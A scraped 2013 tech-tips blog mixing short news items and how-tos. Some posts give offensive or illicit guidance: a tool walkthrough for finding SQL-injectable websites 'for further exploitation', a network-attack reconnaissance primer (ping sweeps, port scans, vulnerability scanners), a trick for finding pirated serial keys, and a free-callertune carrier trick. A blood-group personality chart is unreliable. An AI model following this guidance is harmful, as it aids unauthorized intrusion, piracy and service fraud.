Tuesday 31 December 2013

Friends of Technology: Cash machines raided with infected USB sticks

Friends of Technology: Cash machines raided with infected USB sticks: The thieves focused on high value notes to minimise the time they were exposed Researcher...

Cash machines raided with infected USB sticks


Woman at cash machine The thieves focused on high value notes to minimise the time they were exposed
Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year.
The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs.
Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Computing Congress in Hamburg, Germany.
The crimes also appear to indicate the thieves mistrusted each other.
The two researchers who detailed the attacks have asked for their names not to be published
Access code The thefts came to light in July after the lender involved noticed several its ATMs were being emptied despite their use of safes to protect the cash inside.
After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks.
USB stick The malware was installed onto the ATMs via USB sticks
Once the malware had been transferred they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered.
To activate the code at the time of their choosing the thieves typed in a 12-digit code that launched a special interface.
Analysis of software installed onto four of the affected machines demonstrated that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind.
The researchers said this allowed the attackers to focus on the highest value banknotes in order to minimise the amount of time they were exposed.
But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo.
To counter this risk the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money.
The correct response varied each time and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed.
If they did nothing the machine would return to its normal state after three minutes.
The researchers added the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse.
However, they added that the approach did not extend to the software's filenames - the key one was called hack.bat

Friends of Technology: Samsung Galaxy S5 could come with 4GB RAM

Friends of Technology: Samsung Galaxy S5 could come with 4GB RAM: Samsung today unveiled the latest 8Gb LPDDR4 RAM for high-end smart devices, using which the company can offer as much as 4GB of memory...

Samsung Galaxy S5 could come with 4GB RAM


Samsung today unveiled the latest 8Gb LPDDR4 RAM for high-end smart devices, using which the company can offer as much as 4GB of memory on a device. According to ZDNet Korea, this RAM could be first featured on the forthcoming Samsung Galaxy S5.

Samsung has used a 20nm process to fabricate the 8Gb LPDDR4 RAM and can fit 1GB of memory into a single chip. What this essentially means is that using four such chips in a single device, Samsung could offer 4GB of RAM in a single device.
The newly developed RAM is also said to be 50 percent faster in terms of performance and consumes 40 percent less energy at 1.1 volts than LPDDR3 RAM. Samsung will start manufacturing the RAM early next year and could hence be ready to power the forthcoming Galaxy S5 smartphone.

From what we know so far, the Galaxy S5 is likely to feature a 5.25-inch 2,560×1,440 pixels display with a pixel density of 560ppi, an integrated eye scanner, a new 64-bit eight-core Exynos processor or a quad-core Snapdragon processor depending on the device model, a 16-megapixel camera with new technology that improves low-light photo quality, a 4,000mAh battery and run on Android 4.4 KitKat.
Watsapp killed sms
.
.
YouTube killed DVDs
.
.
Skype killed ISD calls
.
.
EBay killed real life shopping
.
.
And
.
Facebook killed real life

HAPPY NEW YEAR

Happy new year guys,expect more and new stuff from Friends of Technology next year.................. HAPPY NEW YEAR

Friends of Technology: This is very latest n interesting research about a...

Friends of Technology: This is very latest n interesting research about a...: A(+) : Good Leadership A(-) : Hard Working B(+) : Can give up (sacrifices) for others B(-) : Non Flexible , Selfish n Sadistic 0(+) : S...

This is very latest n interesting research about all 8 blood Group...


A(+) : Good Leadership
A(-) : Hard Working
B(+) : Can give up (sacrifices) for others
B(-) : Non Flexible , Selfish n Sadistic
0(+) : Sharp Minded, very difficult to
understand
0(-) : Narrow Minded
AB(+) : Born to Help
AB(-) : Intelligent !
Share with your Friends
7 hours ago
Like · Comment · Share
Hide story
34 people like this.
Write a comment...
Comment
Or attach a photo

It just got a lot easier to get Google Glass..

Guess the output of the following C Code:-


‪#‎include‬<stdio.h>
#include<conio.h>
void main()
{
int i=3;
if(i==3);
printf("I will be printed 3 times\n");
getch();
}

The 5 Most Basic Methods to Start LearningHacking


1. Learn TCP/IP, HTTP and HTTP Proxies.

2. Learn HTML, PHP, JavaScript, Python and C++

3. Learn Web Application Arch. & OWASP Top 10 Vul.

4. Learn Common Attacks, Flaws, Bugs and Exploits.

5. Work with Linux, & Try to Understand How System Works.

Friends of Technology: 5 Best Free Microsoft Office Alternatives

Friends of Technology: 5 Best Free Microsoft Office Alternatives: - - - - - - - - - - - - - - - - - - - - - - Microsoft office is the major productivity package which contains number of useful tools lik...

5 Best Free Microsoft Office Alternatives


- - - - - - - - - - - - - - - - - - - - - -
Microsoft office is the major productivity package which contains number of useful tools like Microsoft word, excel, PowerPoint etc. But we cant get it for free. Microsoft office is the commercial version developed Microsoft Corporation. Actually the price of this package is higher than windows OS. Actually this package is available 60 days for free. However, it�s important for small business owners to know that these types of office applications are also available in free and open source office productivity applications.

Read More:- http://techreviewpoint.com/5-best-free-microsoft-office-alternatives/

Friends of Technology: What is a capacitive touchscreen?

Friends of Technology: What is a capacitive touchscreen?: --Most commonly used in premium smartphones and tablets , capacitive touchscreens are able to sense the electrical conductivity of a hum...

What is a capacitive touchscreen?



--Most commonly used in premium smartphones and tablets , capacitive touchscreens are able to sense the electrical conductivity of a human fingertip and use it to determine its location on the screen.

Insulating materials such as gloves will prevent such touchscreens working. So don't use these touchscreen while wearing gloves.

Nowadays, most of the Android phone manufacturers use capacitive touch for their devices due to its efficiency.

Friends of Technology: Calculation Size of Circuit Breaker & Fuse are as ...

Friends of Technology: Calculation Size of Circuit Breaker & Fuse are as ...: This MS Excel spreadsheet has possibilities to calculate following: - Size of Circuit Breaker on Primary side of Transformer as per NE...

Friends of Technology: How To Find Vulnerable Website using SQL

Friends of Technology: How To Find Vulnerable Website using SQL: Poizon Software Steps:- 1) First download SQL Poizon software. 2) Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and you will...

Calculation Size of Circuit Breaker & Fuse are as per NEC 450.3



This MS Excel spreadsheet has possibilities to calculate following:

- Size of Circuit Breaker on Primary side of Transformer as per NEC 450.3
- Size of Fuse on Primary side of Transformer as per NEC 450.3
- Size of Circuit Breaker on Secondary side of Transformer as per NEC 450.3
- Size of Fuse on Secondary side of Transformer as per NEC 450.3
- Size of Transformer
- Transformer Full Load Losses.

Spreadsheet is developed by Mr. Jignesh Parmar

How To Find Vulnerable Website using SQL


Poizon Software
Steps:-
1) First download SQL Poizon software.
2) Now run Sql Poizon v1.1 - The Exploit Scanner.exe file and
you will get the following window.
3) Once you have opened it, you will have to select a dork. I
am using an PHP dork in this example. After you have
selected the desired dork press Scan and it'll show the results
in the Result Panel.
4) Now you have to send the results to the Sqli Crawler. You
can do this by rightclicking in the Results Panel and select
" Send to Sqli Crawler -> All "
5) Now the Sqli Cralwer tab will open and all you have to do
is press Crawl and it will check if the website is really
vulnerable to SQL Injection.
6) Now you have to press Export Results and place it
somewhere where you can open it later for furthur
exploitation.

H4ckz

Monday 30 December 2013

Friends of Technology: HOW TO FIND SERIAL KEYS FROM GOOGLE

Friends of Technology: HOW TO FIND SERIAL KEYS FROM GOOGLE: steps:- 1) go to google.com 2) write the name of the software you want key and add 94FBR at the end Eg :- if you want to find key of ...

HOW TO FIND SERIAL KEYS FROM GOOGLE


steps:-
1) go to google.com
2) write the name of the software you want key
and add 94FBR at the end
Eg :- if you want to find key of IDM then write "
IDM 94FBR " (without quotes)
3) search it and you will find many sites with
serial keys of that software's

DONE !!!!

Top 20 Websites Making The Most Money


20. LinkedIn - $215,200,000 $7 per second
19. ClickBank - $350,000,000 $11 per second
18. Yandex - $439,700,000 $14 per second
17. Orbitz - $757,500,000 $24 per second
16. Groupon - $760,000,000 $24 per second
15. Taobao - $774,210,000 $25 per second
14. Zynga - $850,000,000 $27 per second
13. Skype - $860,000,000 $27 per second
12. Overstock - $1,100,000,000 $35 per second
11. Baidu - $1,199,000,000 $38 per second
10. Facebook - $2,000,000,000 $63 per second
9. NetFlix - $2,160,000,000 $68 per second
8. AOL - $2,417,000,000 $77 per second
7. Priceline – $3,072,240,000 $97 per second
6. Expedia, Inc. - $3,348,000,000 $106 per second
5. Alibaba - $5,557,600,000 $176 per second
4. Yahoo! - $6,324,000,000 $200 per second
3. eBay - $9,156,000,000 $290 per second
2. Google - $29,321,000,000 $929 per second
1. Amazon – $34,204,000,000 $1,084 per second

Top Websites to Download Torrents via IDM


- - - - - - - - - - - - - - - - - - - - - -
Hey Friends i am gona show you sites list if you use them to download torrent you will no more need torrent soft wares and you can download directly.You can use INTERNET DOWNLOAD MANAGER (IDM) to download for high speed.

Why Download Torrents via IDM?

IDM is the most popular Download ...

Read More:- http://techreviewpoint.com/top-websites-to-download-torrents-via-idm/

Friends of Technology: How to use USB pen drive as RAM in Windows XP :

Friends of Technology: How to use USB pen drive as RAM in Windows XP :: 1. First connect your pen drive to computer. Note that pen drive should be at least of 1GB. 2. Now right click on the my computer and the...

How to use USB pen drive as RAM in Windows XP :


1. First connect your pen drive to computer. Note that pen drive should be at least of 1GB.
2. Now right click on the my computer and then click properties.
3. Click on Advanced Tab and then Performance.
4. Now click on Advanced and then click on Virtual Memory.
5. Select your pen drive icon and click Custom size.
6. Now view the memory available in your pen drive and note it down then click on OK.
7. Restart your computer and enjoy your fast system. How to use USB pen drive as RAM in Windows Vista and Windows 7:
1. Insert your pen drive and format it.
2. Right click on your pen drive and click on properties.
3. Now click on Ready boost tab and then Use this device.
4. Choose maximum space to reserve system speed then click on OK and Apply. You've done! use your pen drive as RAM.

Today I Am Back With Latest Airtel Free Hellotune Trick.


Follow Below Simple Method:

Dial *678*559# From Your Airtel Mobile
And Your Callertune Is Successfully Set Without Any Cost.

Note:- Deactivate Callertune Before 1 Month Completion, Then After Deactivation You Can Activate Callertune Again.

Saturday 28 December 2013

Friends of Technology: HOW TO CHANGE MAC ADDRESS IN KALI / BACKTRACK /LIN...

Friends of Technology: HOW TO CHANGE MAC ADDRESS IN KALI / BACKTRACK /LIN...: It is very easy to change mac address in backtrack as we can change mac address to any in a minute by using simple commands. Let's st...

HOW TO CHANGE MAC ADDRESS IN KALI / BACKTRACK /LINUX


It is very easy to change mac address in backtrack as we can change mac address to any in a minute by using simple commands.

Let's start.
1. Open Terminal.
2. In terminal, type ifconfig eth0 down.
3. The above command is used for disabling the eth0 interface.
4. Now change the mac address by using a simple command in backtrack.

macchanger --mac 00:11:22:33:44:55 eth0.

5. You change your mac address to any number by using the following command.
6. Now configure the eth0 by a command

ifcofig eth0 up

7.Thats it you have changed mac address.

Friday 27 December 2013

2013 BONUS TRICKS FOR ALL OF YOU


1. How to Download Facebook Videos

Simply copy the URL of the video you want to download, then go to http://www.downvids.net/, paste your link and click download. Tada! Your video will be downloaded in few minutes!

2. Track Pending Friends Requests That You Have Made

Sent a friend request but don't know if it has been accepted? Track your request by following below steps:

- Open Friend Request App apps.facebook.com/friendrequestsafter logging in to Facebook and allow the app to access your friend requests.
- Click on the find 'past pending friend requests', for tracing previous sent requests.
- Click on Get Friend Request data button and copy paste the code from the popup.
- Finally click on the load friend request button and you will get your list of pending friend requests.
- Click on suggested tab to get a list of suggested friends or you can click on Bulk upload friend tab to confirm requests people sent to you.
- You can cancel any request just by clicking the cancel button in front of user profile from the list.

3. Remove Facebook Advertisements

Yes it is possible if you use Google Chrome! The Fabulous extension for Google chrome, helps you disable the Facebook advertisements so you can enjoy the cleaner Facebook.

4. Customize Facebook colors and fonts

The Fabulous extension of Chrome is indeed fabulous! Not only will it help you to remove the Facebook ads as we mentioned above, but it also helps you to change the color of your facebook page! Sounds amazing no?

5. Create Cool text styles for Facebook

You can create stylish font text styles for Facebook status by using Webestools that converts your text in stylish font!

6. Choose Custom Title and Description for Links

You can choose a custom title and description for links you post on Facebook by clicking on them.

7. Send large files up to 1 GB on Facebook

Yes you read it right, you can send big files upto 1 GB directly from your Facebook. One can store files in the locker till certain number of days so that your friends can download them via pipe app on Facebook. Your friends can download them in upto 1 week time.

8. Find Who UnFriends you on Facebook

Yes we know that there are a lot of spam apps that want to tell you about the old friends that have unfriended you, but it is not just a trick. It is actually possible by using unfriend alerts application for Facebook. This app sends you notifications whenever any of your friends removes you from his/her friend list.

9. Disable Seen option in Facebook Chat

We know how tricky the new 'seen at xx:xx AM' feature on Facebook chat can get. Have you ever wished to disable this feature? Well here's the solution if you have chrome. Just install FB unseen extension to your chrome browser and your friends will never get notified when you read their messages.

10. Check Who Is Online and pretending to be Offline

So you think your girl friend is online and she is trying to ignore you by getting invisible? Well before you burst into a fight, try using this app. The Online now application will help you detect which friend is using Facebook secretly while keeping Facebook Chat offline.

11. Change Facebook Themes

If you think just changing the color of Facebook wasn't enough, how about changing the colors and whole look of Facebook website? Here is another amazing chrome/mozilla extension 'Facebook themes' that allows you to change Facebook themes.

12. Facebook Fake Wall Post Prank

This is one real fun prank for Facebook which allows you to create custom Facebook status updates, alerts, events on the behalf of others. So get set to create status updates with name of famous celebrities by using thewallmachine and connect using Facebook account in order to proceed.

13. Login to Multiple Facebook account at a Time

By using Google chrome Browser, you can login to multiple Facebook accounts at a time. Open Google chrome and login to your Facebook account. Then click the settings tab and add a new user to chrome browser. It will open a new chrome window where you can login to other Facebook account. Now, you will be able to use and manage both accounts using the two chrome windows. In the similar manner, you can access as many Facebook accounts as you like using Google chrome ,
Imagine
if trees gave off wi-fi signals,
we'd b planting many trees and save d planet
too...
.
.
.
.
.
.
.
.
.
.
.
Sadly, trees only give oxygen.

Some Major Internet Error Codes and their Meanings :-


# 400 - error is simply a bad request error, as you might be typing some unknown URL that server could not understand, so make sure that URL you are typing is write.

# 401 - If you try to access some unauthorized website than you might see this 401 error, so make sure you have entered correct username and password.

# 402 - error is specified for any kind of payment errors you receive, so if you attempting any transaction and you forgot to add payment information than you might face this error.

# 403 - error can cause if you are accessing any forbidden page s its somewhat similar to 401 error, so make sure you are not blocked by that website.

# 404 - is the most common and most recognized error, so its like most website have this error, so that website might be removed or re-named so make sure spellings are good.

# 408 - error is the timeout error, so if you are on some page where it requires you to add something in specified time and you do not do that than you might face this 408 error.

Friends of Technology: Hacking Windows SEND TO MENU

Friends of Technology: Hacking Windows SEND TO MENU: Now send any file to your Folder directly via Send to Menu... Follow the Steps... First you’ll need access to hidden files. So change y...

Hacking Windows SEND TO MENU


Now send any file to your Folder directly via Send to Menu...
Follow the Steps...
First you’ll need access to hidden files. So change your view
settings to make all hidden files visible.
In My Computer..
Tools -> folder options -> view (tab) and select the show
hidden files and folders.
go to parent drive:/documents and settings/(user name)/send
to
Open up my computer and locate your most used folders.
Create a shortcut of the most used folders in SEND TO
FOLDER. (You can do this in a number of ways.)
Right click -> send to desktop(create shortcut) and move the
shortcut from the desktop to the SEND TO FOLDER
Copy the most used folder and go to SEND TO FOLDER and
right click -> paste shortcut.
Also remember to rename the shortcuts to send to videos or
send to photos. You don’t need confusion when You use the
same later.

‪#‎H4ckz‬

Friends of Technology: Play Movie In Paint

Friends of Technology: Play Movie In Paint: Step 1: Open Ms Paint. Step 2: Open your Video player. Step 3: Click on the Print screen Button on your keyboard. Step 4: In Ms Paint...

Play Movie In Paint



Step 1: Open Ms Paint.
Step 2: Open your Video player.
Step 3: Click on the Print screen Button on your keyboard.
Step 4: In Ms Paint us the shortcut ctrl+v or got to the Edit Tab and choose Paste option.
Step 5: Bingo!!!!

Note:
1. This works only with Ms Paint.
2. For the movie to play in Paint the video player should not be closed and the movie should not be paused in the player.

Friends of Technology: 6 Websites To learn Coding !!!

Friends of Technology: 6 Websites To learn Coding !!!: The below Websites will help you to learn CSS, HTML, PHP, JavaScript, CSS3, HTML5, Ruby, etc and it doesn't require any skills . #1...

6 Websites To learn Coding !!!


The below Websites will help you to learn
CSS, HTML, PHP, JavaScript, CSS3, HTML5,
Ruby,
etc and it doesn't require any skills .
#1. w3schools
#2. Codecademy
#3. Code avengers
#4. CodeSchool
#5.TeamtreeHouse
#6.Dreamincode

Friends of Technology: Here some common PC errors and the solutions for t...

Friends of Technology: Here some common PC errors and the solutions for t...: Do have a look...................!! 1. MONITOR LED IS BLINKING Check all the connections like Monitor Cable, Data cables,RAM, Display C...

Here some common PC errors and the solutions for them...


Do have a look...................!!
1. MONITOR LED IS BLINKING
Check all the connections like Monitor Cable, Data
cables,RAM, Display Card , CPU connections.
2. CONTINUOS THREE BEEPS
Problem in RAM Connection.
3. THREE BEEPS ( 1 Long 2 Short)
Problem in Display Card Connection
4. THREE LONG BEEPS PERIOD WISE
Problem in BIOS or RAM (Basic Input Output System)
5. CONTINUOS NON-STOP BEEPING
Key Board Problem (I.e.; Some Key is pressed for
Longer time)
6. FDD LED IS GLOWING CONTINUOSLY
Data cable to be connected properly (twisted cable).
7. NO DISPLAY ON THE SCREEN AT ALL
Hard Disk cable connected wrongly. Connect rightly
seeing the Red mark (Faces power supply) and then
Restart.
8. POWER LED IS OFF
a. Check main power cord
b. Check S.M.P.S.
c. Check Mother Board connection
9. SHOWING CMOS ERROR
Replace 3 Volt battery of Mother Board . Set Original
Settings Manually.(Refer CMOS Setup chart)
Enter your search termsSubmit search form
10. SHOWING FDD ERROR OR FLOPPY DRIVE IS NOT
WORKING PROPERLY
Check Power cord of FDD , Data Cables , set CMOS &
Finally the Check drive.
11. SHOWING HDD ERROR OR HARD DISK FAILURE
a. Check Power Cord
b. Check connection of HDD
c. Check Data cable
d. Check Hard Disk parameters in CMOS or Auto
detecting Setting Partitions by Fdisk Command, then
format it to set track 0.
12. MOTHER BOARD HANGS DUE TO UNSTABILIZED
POWER SUPPLY
a. Check S.M.P.S
b. RAM not functioning properly.
c. Software problem (due to using pirated software)
d. CPU fan not functioning properly.
13. DANCING SCREEN
a. Check Display card connection
b. Virus Problem
c. Video Memory Problem
14. SHAKING SCREEN
a. Earthing problem
b. Magnetic waves comes around.
15. CPU CABINET SHOCK
a. Check Earthing
b. Check main power cord.
16. NON-SYSTEM DISK ERROR
a. Floppy Drive having different disk (Non-Bootable
Disk) OR CMOS Parameters for Hard Disk may not be
set properly.
b. Hard Disk Partitions may not be created.
c. Hard Disk may not be formatted.
17. MISSING OPERATING SYSTEM
The System files missing namely Ie; command.com} -
User File IO.SYS & MS_DOS.SYS } - Hidden Files. These
above three files required for Start up of the system
that can be transferred by using SYS C: Command OR
While the time of formatting by using Format c:/u/s
18. MISSING COMMAND INTERPRETOR
May the file Command.com is corrupted OR Infected
by Virus OR Some one has Erased it.
19. SHOWING I/O ERROR
a. The type of Hard Disk in CMOS may not be set
properly.
b. Operating system used for formatting is not valid
20. SHOWING DIVIDE OVER- FLOW MESSAGE
a. May some Directories or Files crash with other files.
b. Use CHKDSK/F or SCANDISK Command to correct it.
21. HARD DISK MAKING NOISE WHILE PROCESSING
a. Unstabilized power supply.
b. Check for Loose Contact.
c. Do not use Y Connectors for Hard Disk.
d. It may create Bad Sector OR Weak Hard Disk.
22. HARD DISK HANGS WHILE PROCESSING
Check for Bad Sector by using CHKDSK or SCANDISK
Command. If found format the Hard Disk and set
Partition before that area.(This is the only procedure
to use Hard Disk with Bad Sector) OR (To avoid Bad
Sectors use Standard Power Supply)
23. HARD DISK NOT DETECTED
a. Check Power Connector
b. Check Data Cables
c. Check Jumpers
24. PARTITION NOT SHOWN
Operating System where the Hard Disk formatted is
not supported with present Mother Board. For Eg:
Hard Disk formatted with Pentium System will hide
their partitions for 486 System.
25. MMX/DLL FILE MISSING
May the above files may be corrupted due to power
failure or Virus. Make available above files from other
Computer. OR Reinstall Windows 98 Operating
System. (This procedure will not make any effect on
existing Data).
26. WINDOWS REGISTRY ERROR
This will happen due to sudden ON/OFF of the
system. Final solution is to Reinstall Operating System.
27. DISPLAY COLOUR DOES NOT MATCH
a. Configure Display Card properly with their CD.
b. The Standard setting for Windows is set it to
800x600 for better performance.
28. UNKNOWN DEVICE FOUND
May the Driver utility is not provided with operating
system . Insert Driver CD and install software for the
above Device...

Ways To Attack a Network:



>>>>Ping

The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name. PING stands for “Packet Internet Groper” and is delivered with practically every Internet compatible system, including all current Windows versions.

Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses

>>>>ICMP

(Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP Echo reply packets.

All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping <ip address or hostname>
(For example: ping yahoo.com)

This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.

>>>>Ping Sweep

If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org/) also contains an option
to perform ping sweeps.

>>>Tracert:

Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.

Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure below.

Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.

If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.

Go to DOS prompt and type tracert <destination address>
(For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute

>>>Port Scanning:-

After you have determined that your target system is alive the next important step would be to perform a port scan on the target system. There are a wide range of port scanners available for free. But many of them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org/) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.

Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running, firewalls being used and a lot more.

Common ports:

Below is a list of some common ports and the respective services
running on the ports.

20 FTP data (File Transfer Protocol)

21 FTP (File Transfer Protocol)

22 SSH

23 Telnet

25 SMTP (Simple Mail Transfer Protocol)

53 DNS (Domain Name Service)

68 DHCP (Dynamic host Configuration Protocol)

79 Finger

80 HTTP

110 POP3 (Post Office Protocol, version 3)

137 NetBIOS-ns

138 NetBIOS-dgm

139 NetBIOS

143 IMAP (Internet Message Access Protocol)

161 SNMP (Simple Network Management Protocol)

194 IRC (Internet Relay Chat)

220 IMAP3 (Internet Message Access Protocol 3)

389 LDAP

443 SSL (Secure Socket Layer)

445 SMB (NetBIOS over TCP)

Besides the above ports they are even some ports known as Trojan ports used by Trojans that allow remote access to that system.

>>>>Vulnerability Scanning:

Every operating system or the services will have some vulnerabilities due to the programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is
an excellent mailing list discussing the vulnerabilities in the various system. The exploit code writers write exploit codes to exploit these vulnerabilities existing in a system.

There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.

Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com/ vulnerabilities and exploit codes of various operating systems. Packet storm security
(http://www.packetstormsecurity.com/) is also a nice pick.

Thursday 26 December 2013

Epic


Friends of Technology: Google Robot Won

Friends of Technology: Google Robot Won: Florida-A robot developed by a  Japanese  start-up recently  acquired  by Google is the  winner  of a two-day competition hosted by ...

Friends of Technology: No Mobile in 2014

Friends of Technology: No Mobile in 2014: In 2014, the mobile Web will die. That’s right, that bastardized version of the normal Web will crawl into a shallow grave and leave u...

No Mobile in 2014

In 2014, the mobile Web will die. That’s right, that bastardized version of the normal Web will crawl into a shallow grave and leave us all in peace. No more websites crippled with horrible “mobile.yourawfulwebsite.com” URLs. No more reading junky websites that display way too much fine print or omit crucial features when viewed on your smartphone or tablet. 
How will we kill the mobile Web? Not with kindness, that’s for sure. The death of the mobile Web should be ruthless and efficient, coming on the backs of development, iteration and innovation. Google, Microsoft and Apple will lead the charge.
This year, we saw a lot of developmental gains in the browsers on mobile devices:
·         Apple updated Safari in iOS 7 to be faster and more agile
·         Google showed off its newest version of its Chrome browser at Google I/O in May this year to show the same website running on a PC, tablet and smartphone without a hitch
·         Microsoft’s latest Internet Explorer in Windows 8.1 RT and Windows Phone 8 is the fastest and most diverse that the company has ever created
·         Mozilla unleashed its Firefox OS on the world, a browser-based mobile operating system designed on the principles of HTML5.
The mobile Web will die because the companies that make the engines it ran upon are killing their mobile browsers and replacing them with fully functional versions that run on any device. In 2014, these browsers will be updated to put the final nail in its coffin.
In turn, developers will continue to build websites that can work across any screen size. Responsive design (what we do at Read Write to make the site look pretty everywhere) will continue to grow in 2014 as people realize that their old websites are losing them a lot of traffic from mobile devices.
That’s the prediction, at least. Now it's up to 2014 to prove me right.
Looking Backward
Last year I went out on a limb with my mobile predictions for 2013. As always, the prognostications were a little hit and miss.
I said that BlackBerry (then still Research In Motion) would kill it with the new BlackBerry 10 operating system. Today, BlackBerry announced a $4.4 billion quarterly loss.
OK, so I pooched that one badly. But I got the next one right when I said that Microsoft would continue to iterate and expand with Windows Phone. While Microsoft hasn't yet hit it big with its rival to iOS and Android, it's still gaining ground, so I'll count that as a win. With Nokia now in its fold, next year may be the acid test for Windows Phone.
I was right when I said that Apple would release the iPhone first and the iPad second this year, as the iPhone was released in September and the iPhone in late October. A minor prediction for 2014: Apple will do this again.
Google tweaked me with its Android releases in 2013. I expected Android 5.0 Key Lime Pie and thought we'd see three different iterations of Android this year. Instead we got two: the Jelly Bean 4.3 update in July and the KitKat 4.4 update at the end of October. The age of the major Android update is over, and we'll continue to see iterative updates over time. This is not a prediction; it's merely a fact. In 2014, we will likely see two new versions of Android at mid-year and the end of the year. 
Motorola didn’t make a Nexus device this year. It did make the Moto X, which is the next best thing. Motorola will likely continue with the Moto brand of devices in 2014 without making an actual Nexus device.
Location-based consumer apps didn't let me down; as predicted, they remained stagnant this year. Foursquare and its kindred just are not hot anymore, even if Foursquare did just raise a funding round this week.
On the other hand, mobile payments continued to gain traction. Personally, I use a mobile payments app every day with the Square Wallet at my local coffee shop. Mobile payments may never be the techno-utopia that everybody envisioned in 2011, but the industry is beginning to take shape. In 2014, we will see more people start using apps like Google Wallet and Square to pay at retailers everywhere. It won’t be a major step, but a progression of small ones. 
Looking Forward
1. There Will Be No Apple Television Set
That’s it. Let’s quit it with the rumors about an actual Apple TV set until Tim Cook is showing it off on stage.
2. The Apple iWatch Cometh
This is a far more realistic goal for Apple than shoehorning its way into the crowded, complicated and expensive TV market. An iWatch would be an accessory to your iPhone—not a revolutionary product, but a useful and likely very popular one. The bold prediction: the iWatch will come in the spring and be touted as great way to track your fitness routines, taking advantage of the iPhone’s M7 motion coprocessor.

3. Samsung’s Lead In Smartphones Will Decline
This may actually be under way already, given rumours that its Galaxy S4 flagship phone is selling only about as well as its predecessor, the S3. That wouldn't be terribly surprising, given the S4's under whelmingness, Samsung’s over-the-top marketing and its love of not-terribly-reliable software gimmicks.
Samsung smartphones just aren't as sexy as they were in 2011 and 2012. Clearly, the company will continue to sell vast numbers of devices, but its status as the global mobile powerhouse will slip. That's going to create an opening that Motorola and HTC can and will seize.
4. HTML5 Takes Over The Mobile Web
Everybody continues their handwringing over the decline of HTML5, but in truth the Web standard made a lot of progress in 2013. Web APIs created by Mozilla gave HTML5 some much needed oomph that help it run apps on smartphones and tablets. Combined with CSS and JavaScript, HTML5 is what the Web will be built on in the future. And it will just be the Web, mobile or otherwise.
5. Google Glass Becomes A Consumer Product
In so many ways, 2013 was the year that Google Glass got beta tested. The Glass “Explorers” program was rolled out to a small subset of techies and Google got developers on board for future apps for Glass. It's time for Google to unleash its interesting and controversial cyborg headsets on the world. Prediction: Google will announce Glass for the masses at Google I/O with a retail price of $299. 

6. Android Goes 64-Bit
This isn't actually much of a bold prediction. ARM announced a 64-bit architecture a few years ago with the aim of making it to the mainstream by 2014 or so. Apple has already proved that ARM can work on 64-bit with the iPhone 5S and the iPad Air. Expect Samsung to roll out the first 64-bit ARM chip in a popular Android smartphone, with the blessing of Google.
7. The Concept Of “Mobile” Will Die
Since 2007, when Apple squeezed the power of a PC into a phone, the technology industry has been working to create the same systems, functionality and processes to work with this new class of computing device. Consumers, enterprises, advertising, industry, agriculture … everything that computing touches has been working to catch up with the mobile era.
Eventually it will catch up and instead of thinking of things as “mobile” specifically, it will just be seen as a way to use a computer from anywhere and everywhere. The era of ubiquitous computing is already upon us.

Google Robot Won


Florida-A robot developed by a Japanese start-up recently acquired by Google is the winner of a two-day competition hosted by the Pentagon’s research unit Darpa.
Team Schaft’s machine carried out all eight rescue-themed tasks to outscore its rivals by a wide margin.
Three of the other 15 teams that took part failed to secure any points at the event near Miami, Florida.
Schaft and seven of the other top-scorers can now apply for more Darpa funds to compete in 2014’s finals.
Darpa said it had been inspired to organise the challenge after it became clear robots were only capable of playing a very limited role in efforts to contain 2011’s Fukushima nuclear reactor meltdown in Japan.
“What we realized was ... these robots couldn’t do anything other than observe,” said Gill Pratt, programme manager for the Darpa Robotics Challenge.
“What they needed was a robot to go into that reactor building and shut off the valves.”
In order to spur on development of more adept robots the agency challenged contestants to complete a series of tasks, with a time-limit of 30 minutes for each:
* Drive a utility vehicle along a course
* Climb an 8ft-high (2.4m) ladder
* Remove debris blocking a doorway
Pull open a lever-handled door
* Cross a course that featured ramps, steps and unfastened blocks
* Cut a triangular shape in a wall using a cordless drill
* Close three air valves, each controlled by a different-sized wheel or lever
* Unreel a hose and then screw its nozzle into a wall connector
